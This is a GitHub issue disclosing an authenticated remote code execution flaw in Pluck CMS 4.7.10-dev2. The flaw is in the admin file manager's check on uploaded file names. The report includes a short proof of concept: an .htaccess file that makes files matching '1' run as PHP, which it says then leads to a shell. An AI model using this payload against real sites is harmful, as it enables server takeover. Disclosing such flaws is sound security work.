Skip to content

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability in the management file interface. #83

Closed
@Lilc1

Description

@Lilc1

Vulnerability location:
/data/inc/file.php line:42
image
If the file name is '.htaccess', the strpos function returns a result of 0.
Demo:
Upload these two files in the management file interface.
image
image

Access in /files/1.txt.
image
Successful execution.
Then upload attack code.
image
image
Successfully obtained the shell.
Poc:

.htaccess
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions